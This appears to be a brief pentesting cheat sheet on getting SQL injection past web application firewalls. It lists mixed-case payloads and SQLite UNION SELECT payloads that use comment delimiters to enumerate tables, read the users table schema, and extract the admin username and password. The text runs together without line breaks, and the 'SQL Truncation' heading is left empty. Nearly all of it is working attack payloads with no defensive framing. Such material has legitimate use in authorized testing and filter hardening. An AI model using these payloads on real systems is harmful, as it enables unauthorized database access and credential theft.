SQLi WAF Bypass Techniques
1) Mixed cases
' oR tRue--' UniON sEleCt 1,2,3--2) White Space and Delimiters
SQL: SQLite
'/**/uNion/**/sElect/**/1,2,3,4;--'/**/uNion/**/sElect/**/1,2,name,4 FROM sqlite_master WHERE type='table';--'/**/uNion/**/sElect/**/1,2,sql,4 FROM sqlite_master WHERE name='users';--'/**/uNion/**/sElect/**/username,password,3,4/**/FROM/**/users/**/WHERE/**/username='admin';--3) SQL Truncation
Last updated